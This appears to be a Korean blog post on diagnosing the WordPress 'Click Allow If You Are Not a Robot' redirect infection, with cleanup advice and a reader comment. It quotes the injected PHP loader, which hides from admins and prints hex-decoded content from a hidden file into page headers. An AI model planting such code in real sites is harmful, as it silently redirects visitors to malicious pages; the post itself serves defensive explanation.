워드프레스 사이트에 방문할 때 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요 (Click Allow If You Are Not a Robot)" 화면이 표시되고 이상한 사이트로 리디렉션되는 문제가 발생하는 경우가 있습니다. 이러한 리디렉션 문제는 플러그인 등을 통해 악성코드(리디렉션 코드)가 주입되어 나타날 수 있습니다.
워드프레스 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요" 리디렉션 문제
워드프레스 사이트 접속 시 간헐적으로 위의 그림과 같은 그림이 표시되고 이상한 사이트로 이동하는 문제가 발생하는 경우가 있습니다.
이러한 이상 작동과 관련하여 구글링 해보면 컴퓨터가 TotalRecaptcha.top이라는 애드웨어 바이러스에 감염될 때 이러한 현상이 발생한다고 합니다.
애드웨어는 사용자가 특정 소프트웨어를 사용하거나 설치할 때 자동적으로 광고를 보여주는 프로그램을 일컫습니다. 이는 주로 프리웨어에서 흔히 볼 수 있으며, 광고 수익을 통해 운영되기 때문에 모든 애드웨어가 악성 소프트웨어는 아닙니다.
워드프레스 사이트에 이와 같은 현상이 발생한다면 악성코드가 플러그인 등을 통해 주입되었을 수 있습니다.
Redit의 "Issues with my website - "Confirm youre not a robot""에서 이와 같은 문제에 대한 토론이 올라온 것이 있네요.
사이트가 해킹 당한 것 같으니 Wordfence로 스캔을 해보라는 내용인데요. 워드펜스로 스캔해도 아무 것도 발견되지 않았다고 합니다.
보안업체인 Sucuri의 "How to Fix & Remove the “Click Allow If You Are Not a Robot” Redirect"이라는 블로그 글에서도 비슷한 문제가 소개되고 있습니다. 이 글에서는 다음과 같은 코드가 임의의 플러그인에 주입되어 발생하는 문제라고 합니다.
if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
add_action('wp_head', 'get_hex_cache', 12);
function get_hex_cache()
{
return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp'))));
}
}
하지만 플러그인과 테마 등에서 의심스러운 악성코드를 스캔하여 치료를 시도해도 문제가 해결되지 않을 수 있습니다.
WPCode – Insert Headers and Footers 플러그인을 통해 악성코드가 주입되는 경우가 많다고 합니다. 이 플러그인을 삭제한 후에 문제가 해결되는지 체크해보시기 바랍니다.
WPCode가 편리하지만 사이트가 해킹을 당하거나 멀웨어에 감염되면서 이 플러그인을 통해 리디렉션 코드(악성코드)가 주입될 수 있고, 최근에 이런 사례가 종종 보고되고 있다고 합니다.
이 문제로 고생하던 분이 FTP에 접속하여 이 플러그인 폴더를 삭제하니 문제가 해결되었다고 하네요.
보안플러그인, 보안툴 다 해봤는데 안잡혀서 찾아보다가 원인찾았네요. 최근 해외사례에 많이 나오는데 WP code Insert Headers and Footers 플러그인 사용하시는 분들 저 같은 멀웨어 현상 있으신 분들은 이 플러그인부터 살펴보세요.
여기에 리디렉션코드(악성멀웨어) 심어져 있었고 이런 사례가 종종 발견된다네요. 이거 FTP로 들어가서 삭제하니까 정상화됬네요ㅠㅠ
파일질라 등을 사용하여 FTP/SFTP에 접속하여 플러그인 폴더를 삭제할 수 있습니다. 이 플러그인의 경로는 /wp-content/plugins/inserte-headers-and-footers입니다.
이 조치에도 리디렉션 문제가 해결되지 않으면 여기에서 서비스(유료)를 의뢰하실 수 있습니다.
마치며
사이트가 멀웨어에 감염되어 방문하는 사용자들이 이상한 스팸 사이트로 이동하게 되면 사이트 평판에 영향을 미칠 수 있고 경우에 따라 구글 크롬에서 위험한 사이트로 분류하여 차단될 수도 있습니다.
요즘 나오는 멀웨어는 관리자로 접속할 때에는 아무런 증상이 없고 비로그인 사용자들에게만 증상이 나타나기도 합니다. 이 때문에 관리자가 너무 늦게 사이트 문제를 인지하여 쉽게 해결할 수 있는 문제를 시간을 놓쳐 힘들게 해결해야 하는 경우도 있습니다.
이 글에서 소개하는 멀웨어의 경우 간헐적을 증상이 나타날 수 있습니다. 그래서 조치를 취한 후에 문제가 해결되었는지 체크하는 데 시간이 걸릴 수 있습니다.
우와 감사합니다. 이 문제 때문에 몇달 동안 고통 받고 있었는데 이런 정보를 공유해주셔서 감사합니다. 한번 시도해보고 문제가 해결되지 않은 유료 서비스를 의뢰하겠습니다.
악성코드 문제가 잘 해결되기를 바랍니다. 궁금한 점이 있으시면 아래 댓글란이나 네이버 카페를 통해 문의주시면 아는 범위 내에서 답변드리도록 노력하겠습니다.😄